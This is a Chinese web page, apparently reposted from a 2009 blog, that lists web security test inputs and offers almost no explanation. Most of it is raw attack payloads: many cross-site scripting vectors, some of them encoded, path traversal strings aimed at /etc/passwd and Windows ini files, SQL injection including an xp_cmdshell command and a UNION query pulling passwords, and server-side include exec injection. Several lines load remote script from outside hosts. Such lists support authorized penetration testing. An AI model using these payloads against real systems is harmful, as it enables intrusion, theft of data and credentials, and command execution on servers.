WEB的安全性测试要素

><scrīpt>alert(document.cookie)</scrīpt>
=’><scrīpt>alert(document.cookie)</scrīpt>
<scrīpt>alert(document.cookie)</scrīpt>
<scrīpt>alert(vulnerable)</scrīpt>
%3Cscrīpt%3Ealert(‘XSS’)%3C/scrīpt%3E
<scrīpt>alert(‘XSS’)</scrīpt>
<img src=”javascrīpt:alert(‘XSS’)”>
%0a%0a<scrīpt>alert(\”Vulnerable\”)</scrīpt>.jsp
%22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e
%3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e
%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html
%3f.jsp
%3f.jsp
&lt;scrīpt&gt;alert(‘Vulnerable’);&lt;/scrīpt&gt
<scrīpt>alert(‘Vulnerable’)</scrīpt>
?sql_debug=1
a%5c.aspx
a.jsp/<scrīpt>alert(‘Vulnerable’)</scrīpt>
a/
a?<scrīpt>alert(‘Vulnerable’)</scrīpt>
“><scrīpt>alert(‘Vulnerable’)</scrīpt>
‘;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’–&&
%22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E
%3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E&
%3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
”;!–“<XSS>=&{()}
<IMG SRC=”javascrīpt:alert(‘XSS’);”>
<IMG SRC=javascrīpt:alert(‘XSS’)>
<IMG SRC=javascrīpt:alert(‘XSS’)>
<IMG SRC=javascrīpt:alert(&quot;XSS&quot;)>
<IMG SRC=javascrīpt:alert(‘XSS’)>
<IMG SRC=javascrīpt:alert(‘XSS’)>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=”jav%20ascrīpt:alert(‘XSS’);”>
<IMG SRC=”jav%20ascrīpt:alert(‘XSS’);”>
<IMG SRC=”jav%20ascrīpt:alert(‘XSS’);”>
“<IMG SRC=java\0scrīpt:alert(\”XSS\”)>”;’ > out
<IMG SRC=”%20javascrīpt:alert(‘XSS’);”>
<scrīpt>a=/XSS/alert(a.source)</scrīpt>
<BODY BACKGROUND=”javascrīpt:alert(‘XSS’)”>
<BODY ōNLOAD=alert(‘XSS’)>
<IMG DYNSRC=”javascrīpt:alert(‘XSS’)”>
<IMG LOWSRC=”javascrīpt:alert(‘XSS’)”>
<BGSOUND SRC=”javascrīpt:alert(‘XSS’);”>
<br size=”&{alert(‘XSS’)}”>
<LAYER SRC=”http://xss.ha.ckers.org/a.js”></layer>
<LINK REL=”stylesheet” HREF=”javascrīpt:alert(‘XSS’);”>
<IMG SRC=’vbscrīpt:msgbox(“XSS”)’>
<IMG SRC=”mocha:[code]”>
<IMG SRC=”livescrīpt:[code]”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascrīpt:alert(‘XSS’);”>
<IFRAME SRC=javascrīpt:alert(‘XSS’)></IFRAME>
<FRAMESET><FRAME SRC=javascrīpt:alert(‘XSS’)></FRAME></FRAMESET>
<TABLE BACKGROUND=”javascrīpt:alert(‘XSS’)”>
<DIV STYLE=”background-image: url(javascrīpt:alert(‘XSS’))”>
<DIV STYLE=”behaviour: url(‘http://www.how-to-hack.org/exploit.html’);”>
<DIV STYLE=”width: expression(alert(‘XSS’));”>
<STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>
<IMG STYLE=’xss:expre\ssion(alert(“XSS”))’>
<STYLE TYPE=”text/javascrīpt”>alert(‘XSS’);</STYLE>
<STYLE TYPE=”text/css”>.XSS{background-image:url(“javascrīpt:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
<STYLE type=”text/css”>BODY{background:url(“javascrīpt:alert(‘XSS’)”)}</STYLE>
<BASE HREF=”javascrīpt:alert(‘XSS’);//”>
getURL(“javascrīpt:alert(‘XSS’)”)
a=”get”;b=”URL”;c=”javascrīpt:”;d=”alert(‘XSS’);”;eval(a+b+c+d);
<XML SRC=”javascrīpt:alert(‘XSS’);”>
“> <BODY ōNLOAD=”a();”><scrīpt>function a(){alert(‘XSS’);}</scrīpt><”
<scrīpt SRC=”/Article/UploadFiles/200608/20060827171609376.jpg”></scrīpt>
<IMG SRC=”javascrīpt:alert(‘XSS’)”
<!–#exec cmd=”/bin/echo ‘<scrīpt SRC'”–><!–#exec cmd=”/bin/echo ‘=http://xss.ha.ckers.org/a.js></scrīpt>'”–>
<IMG SRC=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode”>
<scrīpt a=”>” SRC=”http://xss.ha.ckers.org/a.js”></scrīpt>
<scrīpt =”>” SRC=”http://xss.ha.ckers.org/a.js”></scrīpt>
<scrīpt a=”>” ” SRC=”http://xss.ha.ckers.org/a.js”></scrīpt>
<scrīpt “a=’>'” SRC=”http://xss.ha.ckers.org/a.js”></scrīpt>
<scrīpt>document.write(“<SCRI”);</scrīpt>PT SRC=”http://xss.ha.ckers.org/a.js”></scrīpt>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

原文链接:https://www.cnblogs.com/zgqys1980/archive/2009/05/13/1455710.html

原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/17206

(0)
上一篇 2023年5月22日 01:19
下一篇 2023年5月22日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

优速盾注册领取大礼包www.cdnb.net
/sitemap.xml